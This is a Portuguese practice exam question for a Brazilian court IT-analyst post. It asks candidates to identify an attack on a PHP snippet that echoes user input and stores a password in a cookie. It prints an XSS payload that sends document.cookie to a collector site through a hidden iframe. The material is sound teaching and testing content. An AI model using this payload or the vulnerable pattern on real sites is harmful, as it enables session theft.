Simulado Tribunal de Justiça do Estado de Santa Catarina - TJ/SC | Analista de Sistemas | 2020 | Questão 253

Tecnologia da Informação / Linguagens e frameworks de programação / Programação em PHP 5.5 e 7.x

Considere o trecho de programa PHP abaixo.

 
 <?php 
 
 setcookie('PHPSSESID', 'meusid'); 
 setcookie('login', 'meulogin'); 
 setcookie('senha', 'minhasenha');  
 
 echo $GET['var'];  
 
 ?> 
 

Supondo que ao executar este trecho, um usuário passou como entrada:

 

 <script> 
   document.write('<iframe width=1 height=1  
   src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>') 
 </script> 
 

cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com



Um Técnico de TI conclui corretamente que

A ) o trecho com a instrução echo imprime os dados passados pelo usuário, sem oferecer vulnerabilidades ao site alvo.

B ) nada ocorrerá, pois o usuário não poderia passar a entrada indicada.

C ) o navegador, ao perceber que a entrada se trata de um script, encerrará o código sem executar o echo.

D ) trata-se de um ataque do tipo XSS, pois com os dados de cookie é possível capturar senhas de e-mail.

E ) trata-se de um ataque do tipo SQL-Injection, pois o usuário invasor inseriu uma consulta que será enviada diretamente
para o banco de dados relacional.

Responder

Voltar à pagina de tópicos Próxima

Fonte: TéCNICO JUDICIáRIO - TECNOLOGIA DA INFORMAçãO / TRT 2ª / 2018 / FCC